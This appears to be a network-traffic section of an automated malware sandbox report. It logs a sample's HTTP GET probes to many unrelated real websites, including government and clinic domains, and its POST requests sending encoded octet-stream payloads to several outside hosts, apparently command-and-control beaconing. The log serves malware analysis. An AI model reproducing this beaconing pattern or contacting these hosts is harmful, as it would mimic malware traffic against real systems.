                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 7a 73 71 7a 45 37 30 78 67 38 70 70 77 62 64 5a 64 4d 64 65 70 76 62 6f 49 2f 72 72 49 2f 38 78 51 61 35 2f 36 4a 59 49 67 52 65 45 48 76 7a 45 74 68 72 71 32 4a 2f 6e 53 65 35 2f 55 54 4c 64 48 71 35 57 57 6a 4b 54 4d 32 4b 6d 32 42 39 65 4d 73 55 32 68 5a 62 64 46 72 48 33 35 57 65 34 2b 42 4d 35 71 6b 6c 53 35 4e 41 6a 51 59 42 47 31 61 6c 62 72 67 43 48 32 64 49 32 65 48 64 6a 43 6e 36 79 47 38 5a 34 78 56 61 48 77 52 61 41 64 6d 4b 2b 37 55 4c 4b 35 49 76 5a 32 54 70 77 74 33 4c 4f 35 6b 4e 35 38 46 48 30 65 35 52 68 6c 57 35 31 34 30 41 38 34 77 7a 6c 52 70 38 77 57 57 4f 71 47 75 30 52 5a 6e 36 71 4a 2b 49 68 52 65 38 76 77 39 36 32 52 50 41 6e 4c 39 58 74 31 43 77 55 35 4c 58 35 4d 76 78 78 38 4b 51 46 32 45 6a 6e 57 58 6e 65 6a 4d 58 48 4f 39 68 6f 57 48 58 64 68 61 58 4f 39 2f 46 61 2b 6f 52 46 53 4b 61 67 6f 6d 71 73 72 50 47 37 57 7a 6d 68 68 30 4e 6a 64 35 4c 62 64 75 43 57 65 55 49 36 32 45 4d 50 77 31 50 77 38 44 36 73 4d 38 6f 5a 4e 64 65 64 50 73 4d 36 41 5a 6b 79 4b 41 65 74 70 7a 39 6d 59 32 64 47 4d 44 56 72 2b 61 6a 66 34 51 57 71 75 43 58 50 78 50 31 2b 65 2b 47 75 4c 71 4c 51 6a 72 7a 32 44 57 38 4a 50 4d 53 51 70 30 71 65 46 55 4d 72 72 6f 4e 4a 56 2f 73 51 31 63 76 5a 4d 34 4b 44 78 2b 4d 63 39 35 5a 46 6e 4e 54 36 75 39 6b 77 71 45 6e 31 30 6b 62 71 65 54 2f 51 4a 34 46 4e 56 58 38 55 31 46 51 79 68 4e 70 6b 2f 41 70 6a 69 50 42 56 4a 2f 71 68 37 33 56 38 63 69 6f 69 53 66 63 61 50 59 6a 68 5a 64 30 68 4b 45 78 59 39 62 52 6e 5a 67 2b 50 65 56 30 35 44 79 45 76 57 33 73 31 79 52 41 79 49 76 4c 4e 77 6b 71 63 52 56 53 32 58 55 71 72 4a 34 39 7a 55 47 78 71 38 75 31 38 69 6e 67 4b 7a 33 65 64 65 72 4f 77 54 6c 56 59 46 47 73 3d Data Ascii: zsqzE70xg8ppwbdZdMdepvboI/rrI/8xQa5/6JYIgReEHvzEthrq2J/nSe5/UTLdHq5WWjKTM2Km2B9eMsU2hZbdFrH35We4+BM5qklS5NAjQYBG1albrgCH2dI2eHdjCn6yG8Z4xVaHwRaAdmK+7ULK5IvZ2Tpwt3LO5kN58FH0e5RhlW5140A84wzlRp8wWWOqGu0RZn6qJ+IhRe8vw962RPAnL9Xt1CwU5LX5Mvxx8KQF2EjnWXnejMXHO9hoWHXdhaXO9/Fa+oRFSKagomqsrPG7Wzmhh0Njd5LbduCWeUI62EMPw1Pw8D6sM8oZNdedPsM6AZkyKAetpz9mY2dGMDVr+ajf4QWquCXPxP1+e+GuLqLQjrz2DW8JPMSQp0qeFUMrroNJV/sQ1cvZM4KDx+Mc95ZFnNT6u9kwqEn10kbqeT/QJ4FNVX8U1FQyhNpk/ApjiPBVJ/qh73V8cioiSfcaPYjhZd0hKExY9bRnZg+PeV05DyEvW3s1yRAyIvLNwkqcRVS2XUqrJ49zUGxq8u18ingKz3ederOwTlVYFGs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 34 43 4d 58 37 48 62 6f 67 63 6f 31 6d 53 73 78 30 63 55 73 2b 78 6b 46 62 52 71 57 74 79 4f 32 43 74 77 57 6e 54 51 74 4f 53 66 78 48 77 62 54 75 68 73 65 43 50 66 65 78 74 76 6c 58 4c 6d 71 50 32 70 30 67 37 46 69 48 6b 54 39 6a 5a 52 4e 6b 49 69 68 6d 32 4a 67 33 4a 63 71 36 68 56 67 37 59 73 48 77 39 37 45 70 2b 62 56 66 4f 72 6f 63 5a 67 4a 63 37 51 4a 46 56 64 79 67 4f 41 73 39 41 32 55 71 74 50 37 72 45 7a 54 4f 62 78 7a 49 66 41 79 42 2f 31 49 61 49 73 45 4a 7a 78 72 4a 7a 4d 32 58 55 56 69 46 79 73 38 72 6d 65 48 5a 2b 65 34 6a 42 72 79 61 67 72 31 39 42 52 64 34 44 53 51 73 30 6a 31 71 51 68 68 39 32 31 6b 4a 44 78 6b 73 36 76 53 4f 4e 4c 37 2f 38 7a 76 6b 44 41 78 70 35 38 43 56 35 73 7a 66 6c 38 61 69 77 2f 69 2f 72 39 5a 4a 6a 50 4e 4f 32 73 79 70 50 4b 44 58 41 51 6f 31 4f 54 65 53 55 68 57 61 4e 78 30 69 78 47 47 56 6f 6d 43 64 73 57 45 61 72 43 67 43 71 49 46 49 52 66 41 38 45 32 4e 71 33 6d 74 6c 72 61 39 4a 52 4e 2f 61 69 77 48 72 6e 49 6f 76 46 7a 48 51 51 5a 4a 2b 4a 6e 31 6d 75 48 73 4b 4b 61 57 2f 4c 70 59 64 2b 52 46 43 31 43 30 42 66 4e 74 54 43 65 37 5a 33 62 6a 52 4b 75 57 48 56 66 54 6f 55 51 42 39 32 57 49 53 34 6d 6a 6e 69 2f 45 77 31 6c 63 36 30 55 47 70 4a 55 36 67 4f 33 2b 39 37 67 5a 7a 58 79 5a 64 36 70 67 6c 57 63 54 2b 65 53 35 7a 42 30 59 39 6e 6e 35 78 68 4f 2f 4c 75 70 50 69 72 59 6b 4f 66 67 5a 74 73 78 47 46 54 4e 39 42 39 68 39 4d 57 43 4b 50 66 32 64 57 42 4c 52 6b 2f 52 6a 31 43 35 54 59 49 74 6d 68 6d 4d 74 6f 6a 74 34 6e 34 4b 65 6a 62 41 59 52 37 4b 74 32 57 34 47 31 53 42 5a 79 54 6a 72 6f 73 7a 50 6a 45 76 57 51 41 70 42 39 4c 56 4e 58 48 79 77 51 36 52 51 39 42 42 56 36 6e 62 43 78 6a 73 50 6e 61 45 38 66 63 77 78 49 4f 51 52 69 7a 6c 4f 50 45 76 47 5a 69 57 45 55 38 42 66 Data Ascii: 4CMX7Hbogco1mSsx0cUs+xkFbRqWtyO2CtwWnTQtOSfxHwbTuhseCPfextvlXLmqP2p0g7FiHkT9jZRNkIihm2Jg3Jcq6hVg7YsHw97Ep+bVfOrocZgJc7QJFVdygOAs9A2UqtP7rEzTObxzIfAyB/1IaIsEJzxrJzM2XUViFys8rmeHZ+e4jBryagr19BRd4DSQs0j1qQhh921kJDxks6vSONL7/8zvkDAxp58CV5szfl8aiw/i/r9ZJjPNO2sypPKDXAQo1OTeSUhWaNx0ixGGVomCdsWEarCgCqIFIRfA8E2Nq3mtlra9JRN/aiwHrnIovFzHQQZJ+Jn1muHsKKaW/LpYd+RFC1C0BfNtTCe7Z3bjRKuWHVfToUQB92WIS4mjni/Ew1lc60UGpJU6gO3+97gZzXyZd6pglWcT+eS5zB0Y9nn5xhO/LupPirYkOfgZtsxGFTN9B9h9MWCKPf2dWBLRk/Rj1C5TYItmhmMtojt4n4KejbAYR7Kt2W4G1SBZyTjroszPjEvWQApB9LVNXHywQ6RQ9BBV6nbCxjsPnaE8fcwxIOQRizlOPEvGZiWEU8Bf
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 73 6c 75 75 4e 4f 6c 44 68 4d 71 53 79 44 34 57 75 44 7a 32 32 51 4b 34 41 45 75 48 2f 2b 42 2f 4c 61 31 4d 41 36 66 44 43 74 63 38 49 4d 61 2f 30 49 39 41 73 50 7a 39 4f 67 52 67 6a 72 47 50 57 66 6d 6a 74 4d 31 6d 47 4a 58 50 6c 50 33 55 4c 2f 32 4e 46 31 66 41 74 69 30 48 39 69 54 47 68 70 36 4b 63 74 64 70 6a 42 57 61 2f 64 36 36 54 6d 79 38 7a 52 64 34 62 43 5a 31 2b 6f 58 65 34 75 49 6d 6e 33 6d 51 39 76 57 70 42 4c 55 6e 51 6c 78 2b 63 64 57 76 64 65 46 6d 74 65 63 39 58 6a 43 56 53 61 6b 58 65 34 56 43 47 58 32 2b 51 76 76 2f 79 79 59 46 34 75 4b 4d 76 5a 37 34 56 76 4c 5a 54 76 37 43 73 63 36 2b 78 73 6c 48 6f 68 71 67 6e 65 75 52 79 42 38 79 58 31 62 50 62 65 49 51 6d 44 2f 37 63 7a 4b 31 43 63 65 37 42 65 54 47 47 66 43 6f 31 4d 46 6d 57 6c 4d 52 48 2f 6b 4f 76 4c 30 6e 73 65 39 74 4d 44 77 61 33 33 4d 4b 62 79 2f 61 6e 50 79 51 75 67 43 6f 2f 50 46 33 52 75 39 69 6f 67 47 52 37 47 58 63 56 31 77 6b 37 62 52 41 72 35 4e 42 30 38 38 64 67 39 61 43 4c 74 51 4c 73 47 47 2b 72 4f 70 37 52 65 77 54 66 72 68 65 4b 5a 4b 33 32 54 30 6e 6d 33 46 4a 54 31 75 48 58 46 6e 6e 62 76 56 65 46 4d 64 44 45 6f 53 77 76 6d 5a 44 74 31 6c 79 4f 4a 78 36 52 39 50 6a 4a 6e 6c 36 4e 7a 44 71 56 6b 4d 64 6d 2f 38 4a 69 55 38 42 64 50 4f 33 63 48 67 74 70 79 30 46 72 44 6c 48 62 38 47 64 39 52 56 38 6d 39 64 49 78 2b 34 34 32 6c 4c 68 69 6d 2b 58 4b 70 49 56 42 6d 74 72 33 6d 7a 4d 51 4f 50 6e 51 36 32 4f 41 50 78 36 65 51 43 49 7a 73 71 4a 58 48 4b 54 4c 6e 50 42 43 4e 70 58 67 6e 53 38 4d 37 75 70 42 34 64 37 33 4a 66 68 5a 35 32 35 43 48 69 71 79 69 57 69 7a 69 6d 55 37 39 7a 4f 68 72 31 57 Data Ascii: sluuNOlDhMqSyD4WuDz22QK4AEuH/+B/La1MA6fDCtc8IMa/0I9AsPz9OgRgjrGPWfmjtM1mGJXPlP3UL/2NF1fAti0H9iTGhp6KctdpjBWa/d66Tmy8zRd4bCZ1+oXe4uImn3mQ9vWpBLUnQlx+cdWvdeFmtec9XjCVSakXe4VCGX2+Qvv/yyYF4uKMvZ74VvLZTv7Csc6+xslHohqgneuRyB8yX1bPbeIQmD/7czK1Cce7BeTGGfCo1MFmWlMRH/kOvL0nse9tMDwa33MKby/anPyQugCo/PF3Ru9iogGR7GXcV1wk7bRAr5NB088dg9aCLtQLsGG+rOp7RewTfrheKZK32T0nm3FJT1uHXFnnbvVeFMdDEoSwvmZDt1lyOJx6R9PjJnl6NzDqVkMdm/8JiU8BdPO3cHgtpy0FrDlHb8Gd9RV8m9dIx+442lLhim+XKpIVBmtr3mzMQOPnQ62OAPx6eQCIzsqJXHKTLnPBCNpXgnS8M7upB4d73JfhZ525CHiqyiWizimU79zOhr1W
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 34 43 4d 58 37 48 62 6f 67 63 6f 31 6d 53 73 78 30 63 55 73 2b 78 6b 46 62 52 71 57 74 79 4f 32 43 74 77 57 6e 54 51 74 4f 53 66 78 48 77 62 54 75 68 73 65 43 50 66 65 78 74 76 6c 58 4c 6d 71 50 32 70 30 67 37 46 69 48 6b 54 39 6a 5a 52 4e 6b 49 69 68 6d 32 4a 67 33 4a 63 71 36 68 56 67 37 59 73 48 77 39 37 45 70 2b 62 56 66 4f 72 6f 63 5a 67 4a 63 37 51 4a 46 56 64 79 67 4f 41 73 39 41 32 55 71 74 50 37 72 45 7a 54 4f 62 78 7a 49 66 41 79 42 2f 31 49 61 49 73 45 4a 7a 78 72 4a 7a 4d 32 58 55 56 69 46 79 73 38 72 6d 65 48 5a 2b 65 34 6a 42 72 79 61 67 72 31 39 42 52 64 34 44 53 51 73 30 6a 31 71 51 68 68 39 32 31 6b 4a 44 78 6b 73 36 76 53 4f 4e 4c 37 2f 38 7a 76 6b 44 41 78 70 35 38 43 56 35 73 7a 66 6c 38 61 69 77 2f 69 2f 72 39 5a 4a 6a 50 4e 4f 32 73 79 70 50 4b 44 58 41 51 6f 31 4f 54 65 53 55 68 57 61 4e 78 30 69 78 47 47 56 6f 6d 43 64 73 57 45 61 72 43 67 43 71 49 46 49 52 66 41 38 45 32 4e 71 33 6d 74 6c 72 61 39 4a 52 4e 2f 61 69 77 48 72 6e 49 6f 76 46 7a 48 51 51 5a 4a 2b 4a 6e 31 6d 75 48 73 4b 4b 61 57 2f 4c 70 59 64 2b 52 46 43 31 43 30 42 66 4e 74 54 43 65 37 5a 33 62 6a 52 4b 75 57 48 56 66 54 6f 55 51 42 39 32 57 49 53 34 6d 6a 6e 69 2f 45 77 31 6c 63 36 30 55 47 70 4a 55 36 67 4f 33 2b 39 37 67 5a 7a 58 79 5a 64 36 70 67 6c 57 63 54 2b 65 53 35 7a 42 30 59 39 6e 6e 35 78 68 4f 2f 4c 75 70 50 69 72 59 6b 4f 66 67 5a 74 73 78 47 46 54 4e 39 42 39 68 39 4d 57 43 4b 50 66 32 64 57 42 4c 52 6b 2f 52 6a 31 43 35 54 59 49 74 6d 68 6d 4d 74 6f 6a 74 34 6e 34 4b 65 6a 62 41 59 52 37 4b 74 32 57 34 47 31 53 42 5a 79 54 6a 72 6f 73 7a 50 6a 45 76 57 51 41 70 42 39 4c 56 4e 58 48 79 77 51 36 52 51 39 42 42 56 36 6e 62 43 78 6a 73 50 6e 61 45 38 66 63 77 78 49 4f 51 52 69 7a 6c 4f 50 45 76 47 5a 69 57 45 55 38 42 66 Data Ascii: 4CMX7Hbogco1mSsx0cUs+xkFbRqWtyO2CtwWnTQtOSfxHwbTuhseCPfextvlXLmqP2p0g7FiHkT9jZRNkIihm2Jg3Jcq6hVg7YsHw97Ep+bVfOrocZgJc7QJFVdygOAs9A2UqtP7rEzTObxzIfAyB/1IaIsEJzxrJzM2XUViFys8rmeHZ+e4jBryagr19BRd4DSQs0j1qQhh921kJDxks6vSONL7/8zvkDAxp58CV5szfl8aiw/i/r9ZJjPNO2sypPKDXAQo1OTeSUhWaNx0ixGGVomCdsWEarCgCqIFIRfA8E2Nq3mtlra9JRN/aiwHrnIovFzHQQZJ+Jn1muHsKKaW/LpYd+RFC1C0BfNtTCe7Z3bjRKuWHVfToUQB92WIS4mjni/Ew1lc60UGpJU6gO3+97gZzXyZd6pglWcT+eS5zB0Y9nn5xhO/LupPirYkOfgZtsxGFTN9B9h9MWCKPf2dWBLRk/Rj1C5TYItmhmMtojt4n4KejbAYR7Kt2W4G1SBZyTjroszPjEvWQApB9LVNXHywQ6RQ9BBV6nbCxjsPnaE8fcwxIOQRizlOPEvGZiWEU8Bf
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 47 57 61 30 50 6a 36 58 68 4d 71 74 56 62 2f 4b 43 56 56 37 48 69 46 4c 77 6b 62 2b 41 59 39 68 55 6b 76 5a 72 6d 37 56 62 57 6f 76 32 49 65 67 6b 66 57 62 4b 31 73 77 7a 6c 6f 6b 47 4d 46 35 44 51 36 6b 4e 44 59 49 50 32 51 4a 6b 34 63 61 33 6f 6c 6b 53 73 71 4f 6a 74 33 47 53 43 4f 4d 62 2b 69 68 6e 6c 69 2f 54 58 6d 6f 36 61 42 4d 61 61 77 54 76 55 6f 34 37 69 31 59 76 4f 59 4d 58 56 58 6c 2b 48 5a 5a 61 6c 2b 2f 6a 64 62 57 49 55 32 59 72 76 64 66 74 63 6f 30 4a 44 30 71 6e 31 6d 6f 6f 70 70 55 77 30 6b 44 44 6f 77 79 32 32 59 33 70 75 32 50 4c 50 44 67 57 67 34 55 4d 65 72 72 76 46 36 51 56 50 50 4c 55 31 55 41 50 46 32 42 51 4e 53 64 49 5a 76 73 30 43 39 70 45 4e 32 2f 49 73 65 2f 53 6b 33 6e 39 69 54 34 47 55 4f 59 51 6f 48 6d 41 43 45 30 6a 46 4f 2b 77 45 32 62 48 73 52 51 6d 38 35 54 36 46 6c 6b 50 39 78 6b 61 4a 78 76 53 74 46 46 4b 2f 66 52 42 33 67 41 35 79 52 45 78 39 53 69 4d 34 56 76 4a 65 68 74 41 4e 58 5a 71 52 56 55 2b 53 48 54 6c 4d 6e 58 4a 46 65 78 68 55 4f 6e 4e 66 75 45 39 48 36 7a 6e 70 34 6f 69 32 4b 68 2b 48 39 42 61 75 51 4c 7a 48 78 39 4f 45 30 46 42 43 73 73 6a 49 6e 36 67 74 48 6d 38 46 37 4a 52 66 71 33 39 31 33 79 6c 56 30 56 78 31 36 2b 66 65 46 76 63 6c 34 39 6e 48 58 33 2f 69 6f 53 34 2f 49 4f 74 72 67 46 2b 41 52 54 37 36 38 4e 2f 63 32 4c 51 58 6a 53 58 39 4a 6d 33 6a 33 71 43 6d 78 62 44 65 4d 53 4b 4e 48 67 7a 7a 36 50 67 76 53 69 6e 48 76 74 6e 46 65 61 33 65 33 4b 66 79 42 31 55 55 41 7a 39 38 37 63 2f 77 50 41 64 6a 78 46 35 4d 45 6f 37 62 72 61 55 58 58 37 61 4b 63 49 4a 66 78 4c 67 52 44 4f 74 42 31 6b 47 4e 63 52 47 76 70 37 30 6f 7a 71 47 52 45 6d 4d 55 39 68 34 4f 35 49 32 44 50 79 31 36 57 62 47 53 4b 53 6f 43 6b 62 31 51 67 45 47 43 67 47 65 4e 75 4a 76 65 6f 68 50 30 61 4e 59 51 3d 3d Data Ascii: GWa0Pj6XhMqtVb/KCVV7HiFLwkb+AY9hUkvZrm7VbWov2IegkfWbK1swzlokGMF5DQ6kNDYIP2QJk4ca3olkSsqOjt3GSCOMb+ihnli/TXmo6aBMaawTvUo47i1YvOYMXVXl+HZZal+/jdbWIU2Yrvdftco0JD0qn1mooppUw0kDDowy22Y3pu2PLPDgWg4UMerrvF6QVPPLU1UAPF2BQNSdIZvs0C9pEN2/Ise/Sk3n9iT4GUOYQoHmACE0jFO+wE2bHsRQm85T6FlkP9xkaJxvStFFK/fRB3gA5yREx9SiM4VvJehtANXZqRVU+SHTlMnXJFexhUOnNfuE9H6znp4oi2Kh+H9BauQLzHx9OE0FBCssjIn6gtHm8F7JRfq3913ylV0Vx16+feFvcl49nHX3/ioS4/IOtrgF+ART768N/c2LQXjSX9Jm3j3qCmxbDeMSKNHgzz6PgvSinHvtnFea3e3KfyB1UUAz987c/wPAdjxF5MEo7braUXX7aKcIJfxLgRDOtB1kGNcRGvp70ozqGREmMU9h4O5I2DPy16WbGSKSoCkb1QgEGCgGeNuJveohP0aNYQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 7a 73 71 7a 45 37 30 78 67 38 70 70 77 62 64 5a 64 4d 64 65 70 76 62 6f 49 2f 72 72 49 2f 38 78 51 61 35 2f 36 4a 59 49 67 52 65 45 48 76 7a 45 74 68 72 71 32 4a 2f 6e 53 65 35 2f 55 54 4c 64 48 71 35 57 57 6a 4b 54 4d 32 4b 6d 32 42 39 65 4d 73 55 32 68 5a 62 64 46 72 48 33 35 57 65 34 2b 42 4d 35 71 6b 6c 53 35 4e 41 6a 51 59 42 47 31 61 6c 62 72 67 43 48 32 64 49 32 65 48 64 6a 43 6e 36 79 47 38 5a 34 78 56 61 48 77 52 61 41 64 6d 4b 2b 37 55 4c 4b 35 49 76 5a 32 54 70 77 74 33 4c 4f 35 6b 4e 35 38 46 48 30 65 35 52 68 6c 57 35 31 34 30 41 38 34 77 7a 6c 52 70 38 77 57 57 4f 71 47 75 30 52 5a 6e 36 71 4a 2b 49 68 52 65 38 76 77 39 36 32 52 50 41 6e 4c 39 58 74 31 43 77 55 35 4c 58 35 4d 76 78 78 38 4b 51 46 32 45 6a 6e 57 58 6e 65 6a 4d 58 48 4f 39 68 6f 57 48 58 64 68 61 58 4f 39 2f 46 61 2b 6f 52 46 53 4b 61 67 6f 6d 71 73 72 50 47 37 57 7a 6d 68 68 30 4e 6a 64 35 4c 62 64 75 43 57 65 55 49 36 32 45 4d 50 77 31 50 77 38 44 36 73 4d 38 6f 5a 4e 64 65 64 50 73 4d 36 41 5a 6b 79 4b 41 65 74 70 7a 39 6d 59 32 64 47 4d 44 56 72 2b 61 6a 66 34 51 57 71 75 43 58 50 78 50 31 2b 65 2b 47 75 4c 71 4c 51 6a 72 7a 32 44 57 38 4a 50 4d 53 51 70 30 71 65 46 55 4d 72 72 6f 4e 4a 56 2f 73 51 31 63 76 5a 4d 34 4b 44 78 2b 4d 63 39 35 5a 46 6e 4e 54 36 75 39 6b 77 71 45 6e 31 30 6b 62 71 65 54 2f 51 4a 34 46 4e 56 58 38 55 31 46 51 79 68 4e 70 6b 2f 41 70 6a 69 50 42 56 4a 2f 71 68 37 33 56 38 63 69 6f 69 53 66 63 61 50 59 6a 